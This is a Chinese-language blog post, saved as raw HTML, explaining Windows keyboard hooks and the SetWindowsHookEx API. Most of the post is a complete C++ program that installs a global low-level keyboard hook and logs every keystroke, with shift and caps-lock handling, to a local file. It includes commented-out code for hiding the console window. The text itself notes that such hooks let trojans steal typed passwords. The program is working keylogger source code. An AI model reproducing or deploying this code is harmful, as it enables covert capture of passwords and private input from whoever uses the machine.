<script type='text/javascript' src='/js/myjs.js'></script>


<!DOCTYPE html>
<html lang="en" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>键盘钩子 - bubble down</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  
  <meta name="description" content="什么是键盘钩子钩子是操作系统消息处理的一种机制。通过钩...">
  <meta name="author" content="bubble-down">
  <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="https://at.alicdn.com/t/font_1445822_p6ry5n7lrr.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      loading: {
        gif: '/images/theme/loading.gif',
        lottie: ''
      },
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: {
          gif: '/images/theme/loading.gif',
          lottie: ''
        }
      },
      donate: {
        enable: false,
        alipay: 'https://pic.izhaoo.com/alipay.jpg',
        wechat: 'https://pic.izhaoo.com/wechat.jpg'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: true
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: false
      },
      preview: {
        background: {
          default: '',
          api: ''
        },
        motto: {
          default: '莫等闲，白了少年头，空悲切',
          typing: true,
          api: '',
          data_contents: '["data","content"]'
        },
      },
      qrcode: {
        enable: false,
        type: 'url',
        image: 'https://pic.izhaoo.com/weapp-code.jpg',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'default'
      },
      notification: {
        enable: false,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      },
      search: {
        enable: false,
        path: ''
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 6.2.0"></head>

<body class="lock-screen">
  <div class="loading" id="loading"></div>
  
    


  <nav class="navbar">
    <div class="left">
      
        <i class="iconfont iconhome j-navbar-back-home"></i>
      
      
      
        <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
      
      
    </div>
    <div class="center">键盘钩子</div>
    <div class="right">
      <i class="iconfont iconmenu j-navbar-menu"></i>
    </div>
    
  </nav>

  
  

<nav class="menu">
  <div class="menu-container">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/link " class="underline "> 友链</a>
      </li><li class="menu-item">
        <a href="/archives " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories" class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about" class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">bubble down</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="https://raw.githubusercontent.com/qwer597/123456aaa/main/%E9%94%AE%E7%9B%98%E9%92%A9%E5%AD%90/1.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">键盘钩子</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>April 14, 2022</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>7826</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        
        <h2 id="什么是键盘钩子"><a href="#什么是键盘钩子" class="headerlink" title="什么是键盘钩子"></a>什么是键盘钩子</h2><p>钩子是操作系统消息处理的一种机制。通过钩子，应用程序可以安装一个钩子回调过程让系统调用，从而监视系统中的消息队列。<br>在这些消息到达目标窗口之前对这些消息进行处理。<br /><br><strong>钩子分三种</strong><br /><br><strong>进程钩子</strong>：就是只是捕获某一个特定进程的键盘输入。<br /><br><strong>程序钩子</strong>：只捕获某一个程序的键盘输入。<br /><br><strong>全局钩子</strong>：可以捕获所有进程或者程序的键盘输入。<br /></p>
<h2 id="主要函数"><a href="#主要函数" class="headerlink" title="主要函数"></a>主要函数</h2><p><strong>安装钩子</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">HHOOK SetWindowsHookEx(</span><br><span class="line"> </span><br><span class="line">int idHook,//要安装的钩子的类型</span><br><span class="line"> </span><br><span class="line">HOOKPPROC lpfn,//钩子过程的指针，拦截到制定系统消息后的预处理过程</span><br><span class="line"> </span><br><span class="line">HINSTANCE hMod,//应用程序实例的句柄，如果是全局钩子，hInstance是DLL句柄（DllMain中给的模块地址。就是包含HookProc的动态库加载地址。否则给0就可以了，即勾自己。 ）</span><br><span class="line"> </span><br><span class="line">DWORD dwThreadId //要安装钩子的线程id，指定被监视的线程，如果明确指定了某个线程的id就只监视该线程，此时的钩子为线程钩子；如果该参数被设置为0，则表示此钩子为监视系统所有线程的全局钩子</span><br><span class="line"> </span><br><span class="line">)</span><br></pre></td></tr></table></figure>
<p>钩子类型<br>1）WH_CALLWNDPROC     &#x2F;&#x2F;窗口钩子，当系统向目标窗口发送消息时将触发此钩子<br>2）WH_CALLWNDPROCRET     &#x2F;&#x2F;窗口钩子，当窗口处理完消息后将触发此钩子<br>3）WH_CBT   &#x2F;&#x2F;当Windows激活、产生、释放（关闭）、最小化、最大化或改变窗口时都将触发此事件<br>4）WH_DEBUG    &#x2F;&#x2F;调试钩子<br>5）WH_GETMESSAGE    &#x2F;&#x2F;当往消息队列中增加一个消息时将触发此钩子<br>6）WH_JOURNALPLAYBACK     &#x2F;&#x2F;回放钩子，可以用于播放已记录的鼠标和键盘的操作<br>7）WH_JOURNALRECORD     &#x2F;&#x2F;记录钩子，可以用于记录鼠标和键盘的操作，木马程序可以使用此钩子窃取受控方在屏幕中敲入的密码<br>8）WH_KEYBOARD     &#x2F;&#x2F;当敲击键盘时将触发此钩子<br>9）WH_MOUSE    &#x2F;&#x2F;当有鼠标操作时将触发此钩子<br>10）WH_MSGFILTER   &#x2F;&#x2F;消息过滤钩子<br>11）WH_SHELL   &#x2F;&#x2F;Shell钩子<br>12）WH_SYSMSGFILTER    &#x2F;&#x2F;系统消息过滤钩子</p>
<p><strong>钩子过程</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">LRESULT CALLBACK HookProc(</span><br><span class="line"> </span><br><span class="line">int nCode, //该参数是一个钩子标识码，钩子过程会利用它决定下一步的进行的操作。这个标识嘛的值与安装的钩子类型相关</span><br><span class="line"> </span><br><span class="line">WPARAM wParam,//后面两个参数的定义都依赖于nCode参数，一般用于存放于窗口消息相关的内容</span><br><span class="line"> </span><br><span class="line">LPARAM lParam</span><br><span class="line"> </span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p><strong>钩子卸载</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">UnhookWindowsHookEx(</span><br><span class="line">  hhk: HHOOK &#123;钩子句柄&#125;</span><br><span class="line">): BOOL;     &#123;True/False&#125;</span><br></pre></td></tr></table></figure>

<p><strong>SHORT GetKeyState([in] int nVirtKey );</strong><br>此函数可用于识别<strong>CAPS LOCK</strong>，<strong>SHIFT</strong>,<strong>CTRL</strong>,<strong>TAB</strong>等按键的状态</p>
<h2 id="代码实现"><a href="#代码实现" class="headerlink" title="代码实现"></a>代码实现</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;windows.h&gt;</span><br><span class="line">#include&lt;iostream&gt;</span><br><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;conio.h&gt;</span><br><span class="line"></span><br><span class="line">HWND hwnd;</span><br><span class="line">using namespace std;</span><br><span class="line">short s;</span><br><span class="line">short shift_key;</span><br><span class="line">FILE* pfile;</span><br><span class="line">DWORD code;</span><br><span class="line">char alphabet;</span><br><span class="line">HHOOK keyboardHook = 0;</span><br><span class="line">CHAR a[2] = &#123; &#x27;0&#x27;,&#x27;  &#x27; &#125;;</span><br><span class="line">void number(FILE* p, DWORD code)</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">	code = code - 0x30;</span><br><span class="line"></span><br><span class="line">	a[0] = code + &#x27;0&#x27;;</span><br><span class="line">	fprintf(p, &quot;% s&quot;, a);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">void trans_number(FILE* p, DWORD code)</span><br><span class="line">&#123;</span><br><span class="line">	cout &lt;&lt; &quot;code&quot; &lt;&lt; code;</span><br><span class="line">	switch (code)</span><br><span class="line">	&#123;</span><br><span class="line">	case 0x30:</span><br><span class="line">		fprintf(p, &quot;% s&quot;, &quot;) &quot;);</span><br><span class="line">		break;</span><br><span class="line">	case 0x31:</span><br><span class="line">		fprintf(p, &quot;% s&quot;, &quot;! &quot;);</span><br><span class="line">		break;</span><br><span class="line">	case 0x32:</span><br><span class="line">		fprintf(p, &quot;% s&quot;, &quot;@ &quot;);</span><br><span class="line">		break;</span><br><span class="line">	case 0x33:</span><br><span class="line">		fprintf(p, &quot;% s&quot;, &quot;# &quot;);</span><br><span class="line">		break;</span><br><span class="line">	case 0x34:</span><br><span class="line">		fprintf(p, &quot;% s&quot;, &quot;$ &quot;);</span><br><span class="line">		break;</span><br><span class="line">	case 0x35:</span><br><span class="line">		fprintf(p, &quot;% s&quot;, &quot;% &quot;);</span><br><span class="line">		break;</span><br><span class="line">	case 0x36:</span><br><span class="line">		fprintf(p, &quot;% s&quot;, &quot;^ &quot;);</span><br><span class="line">		break;</span><br><span class="line">	case 0x37:</span><br><span class="line">		fprintf(p, &quot;% s&quot;, &quot;&amp; &quot;);</span><br><span class="line">		break;</span><br><span class="line">	case 0x38:</span><br><span class="line">		fprintf(p, &quot;% s&quot;, &quot;* &quot;);</span><br><span class="line">		break;</span><br><span class="line">	case 0x39:</span><br><span class="line">		fprintf(p, &quot;% s&quot;, &quot;( &quot;);</span><br><span class="line">		break;</span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">LRESULT CALLBACK LowLevelKeyboardProc(_In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam)</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">	KBDLLHOOKSTRUCT* key = (KBDLLHOOKSTRUCT*)lParam;</span><br><span class="line">	pfile = fopen(&quot;recode.txt&quot;, &quot;a+&quot;);</span><br><span class="line">	s = GetKeyState(VK_CAPITAL);</span><br><span class="line">	shift_key = GetKeyState(VK_SHIFT);</span><br><span class="line">	if (key-&gt;flags == 128 || key-&gt;flags == 129)</span><br><span class="line">	&#123;</span><br><span class="line">		if ((key-&gt;vkCode &gt; 0x5F) &amp;&amp; (key-&gt;vkCode &lt; 0x6A))</span><br><span class="line">		&#123;</span><br><span class="line">			number(pfile, key-&gt;vkCode - 0x30);</span><br><span class="line">		&#125;</span><br><span class="line">		if ((key-&gt;vkCode &gt; 0x2F) &amp;&amp; (key-&gt;vkCode &lt; 0x3A))</span><br><span class="line">		&#123;</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">			&#123;</span><br><span class="line">				trans_number(pfile, key-&gt;vkCode);</span><br><span class="line">			&#125;</span><br><span class="line">			else</span><br><span class="line">				number(pfile, key-&gt;vkCode);</span><br><span class="line">		&#125;</span><br><span class="line">		if ((key-&gt;vkCode &gt; 0x40) &amp;&amp; (key-&gt;vkCode &lt; 0x5B))</span><br><span class="line">		&#123;</span><br><span class="line">			code = key-&gt;vkCode - 0x41;</span><br><span class="line">			if ((shift_key &lt; 0) &amp;&amp; (s == 1))</span><br><span class="line">			&#123;</span><br><span class="line">				a[0] = code + &#x27;a&#x27;;</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, a);</span><br><span class="line"></span><br><span class="line">			&#125;</span><br><span class="line">			else if ((shift_key &lt; 0) || (s == 1))</span><br><span class="line">			&#123;</span><br><span class="line">				a[0] = code + &#x27;A&#x27;;</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, a);</span><br><span class="line"></span><br><span class="line">			&#125;</span><br><span class="line">			else</span><br><span class="line">			&#123;</span><br><span class="line">				a[0] = code + &#x27;a&#x27;;</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, a);</span><br><span class="line"></span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		// 监控键盘</span><br><span class="line">		switch (key-&gt;vkCode) &#123;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">		case 0x6A:</span><br><span class="line">			fprintf(pfile, &quot;% s&quot;, &quot;* &quot;);</span><br><span class="line"></span><br><span class="line">			break;</span><br><span class="line">		case 0x6B:</span><br><span class="line"></span><br><span class="line">			fprintf(pfile, &quot;% s&quot;, &quot;+ &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0x6D:</span><br><span class="line"></span><br><span class="line">			fprintf(pfile, &quot;% s&quot;, &quot;- &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0x6E:</span><br><span class="line"></span><br><span class="line">			fprintf(pfile, &quot;% s&quot;, &quot;. &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0x6F:</span><br><span class="line">			fprintf(pfile, &quot;% s&quot;, &quot;/ &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0x0D:</span><br><span class="line">			fprintf(pfile, &quot;% s&quot;, &quot;enter &quot;);</span><br><span class="line">			break;</span><br><span class="line"></span><br><span class="line">		case 0x08:</span><br><span class="line">			fprintf(pfile, &quot;% s&quot;, &quot;Backspace &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0x20:</span><br><span class="line">			fprintf(pfile, &quot;% s&quot;, &quot;Space &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0xBA:</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;: &quot;);</span><br><span class="line">			else</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;; &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0xBB:</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;+ &quot;);</span><br><span class="line">			else</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;= &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0xBC:</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;&lt;&quot;);</span><br><span class="line">			else</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot; , &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0xBD:</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;_ &quot;);</span><br><span class="line">			else</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;- &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0xBE:</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;_ &quot;);</span><br><span class="line">			else</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;- &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0xBF:</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;? &quot;);</span><br><span class="line">			else</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;/ &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0xC0:</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;~ &quot;);</span><br><span class="line">			else</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;` &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0xDB:</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;&#123; &quot;);</span><br><span class="line">			else</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;[ &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0xDC:</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;| &quot;);</span><br><span class="line">			else</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;\ &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0xDD:</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;&#125; &quot;);</span><br><span class="line">			else</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;] &quot;);</span><br><span class="line">			break;</span><br><span class="line">		case 0xDE:</span><br><span class="line">			if (shift_key &lt; 0)</span><br><span class="line">			&#123;</span><br><span class="line">				char b[2] = &#123; &#x27;&quot; &#x27;,&#x27; &#x27; &#125;;</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, b);</span><br><span class="line">			&#125;</span><br><span class="line">			else</span><br><span class="line">				fprintf(pfile, &quot;% s&quot;, &quot;&#x27; &quot;);</span><br><span class="line">			break;</span><br><span class="line"></span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	// 将消息传递给钩子链中的下一个钩子</span><br><span class="line">	return CallNextHookEx(NULL, nCode, wParam, lParam);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main(int argc, TCHAR* argv[])</span><br><span class="line">&#123;</span><br><span class="line">	/*</span><br><span class="line">	hwnd = FindWindow(&quot;ConsoleWindowClass&quot;, NULL);</span><br><span class="line">	if (hwnd)</span><br><span class="line">	&#123;</span><br><span class="line">		ShowWindow(hwnd, SW_HIDE);</span><br><span class="line">	&#125;*/</span><br><span class="line">	cout &lt;&lt; &quot;ok&quot; &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">	keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, GetModuleHandleA(NULL), NULL);</span><br><span class="line">	if (keyboardHook == 0) &#123; cout &lt;&lt; &quot;挂钩键盘失败&quot; &lt;&lt; endl; return -1; &#125;</span><br><span class="line"></span><br><span class="line">	MSG msg;</span><br><span class="line">	while (1)</span><br><span class="line">	&#123;</span><br><span class="line">		// 如果消息队列中有消息</span><br><span class="line">		if (PeekMessageA(</span><br><span class="line">			&amp;msg,		// MSG 接收这个消息</span><br><span class="line">			NULL,		// 检测消息的窗口句柄，NULL：检索当前线程所有窗口消息</span><br><span class="line">			NULL,		// 检查消息范围中第一个消息的值，NULL：检查所有消息（必须和下面的同时为NULL）</span><br><span class="line">			NULL,		// 检查消息范围中最后一个消息的值，NULL：检查所有消息（必须和上面的同时为NULL）</span><br><span class="line">			PM_REMOVE	// 处理消息的方式，PM_REMOVE：处理后将消息从队列中删除</span><br><span class="line">		)) &#123;</span><br><span class="line">			// 把按键消息传递给字符消息</span><br><span class="line">			TranslateMessage(&amp;msg);</span><br><span class="line"></span><br><span class="line">			// 将消息分派给窗口程序</span><br><span class="line">			DispatchMessageW(&amp;msg);</span><br><span class="line">		&#125;</span><br><span class="line">		else</span><br><span class="line">			Sleep(0);    //避免CPU全负载运行</span><br><span class="line">	&#125;</span><br><span class="line">	// 删除钩子</span><br><span class="line">	UnhookWindowsHookEx(keyboardHook);</span><br><span class="line"></span><br><span class="line">	return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

      </section>
      <section class="extra">
        
          <ul class="copyright">
  
    <li><strong>本文作者：</strong>bubble-down</li>
    <li><strong>本文链接：</strong><a href="http://example.com/2022/04/14/%E9%94%AE%E7%9B%98%E9%92%A9%E5%AD%90/index.html" title="http:&#x2F;&#x2F;example.com&#x2F;2022&#x2F;04&#x2F;14&#x2F;%E9%94%AE%E7%9B%98%E9%92%A9%E5%AD%90&#x2F;index.html">http:&#x2F;&#x2F;example.com&#x2F;2022&#x2F;04&#x2F;14&#x2F;%E9%94%AE%E7%9B%98%E9%92%A9%E5%AD%90&#x2F;index.html</a></li>
    <li><strong>版权声明：</strong>本博客所有文章均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" title="BY-NC-SA" target="_blank" rel="noopener">BY-NC-SA</a> 许可协议，转载请注明出处！</li>
  
</ul>
        
        
        
  <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/hook/" rel="tag">hook</a></li></ul> 

        
  <nav class="nav">
    <a href="/2022/04/23/buuctf%E4%B8%A4%E9%81%93%E4%BC%91%E9%97%B2%E9%A2%98/"><i class="iconfont iconleft"></i>buuctf两道休闲题</a>
    <a href="/2022/03/22/DLL%E8%B0%83%E7%94%A8%E5%8F%8A%E5%88%9B%E5%BB%BA/">DLL调用及创建<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E9%94%AE%E7%9B%98%E9%92%A9%E5%AD%90"><span class="toc-text">什么是键盘钩子</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BB%E8%A6%81%E5%87%BD%E6%95%B0"><span class="toc-text">主要函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%9E%E7%8E%B0"><span class="toc-text">代码实现</span></a></li></ol>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  


<footer class="footer">
  <div class="footer-social"><a 
        href="tencent://message/?Menu=yes&uin=2549294026 "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#12B7F5'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconQQ "></i>
      </a><a 
        href="javascript:; "
        target="_blank"
        class="footer-social-item"
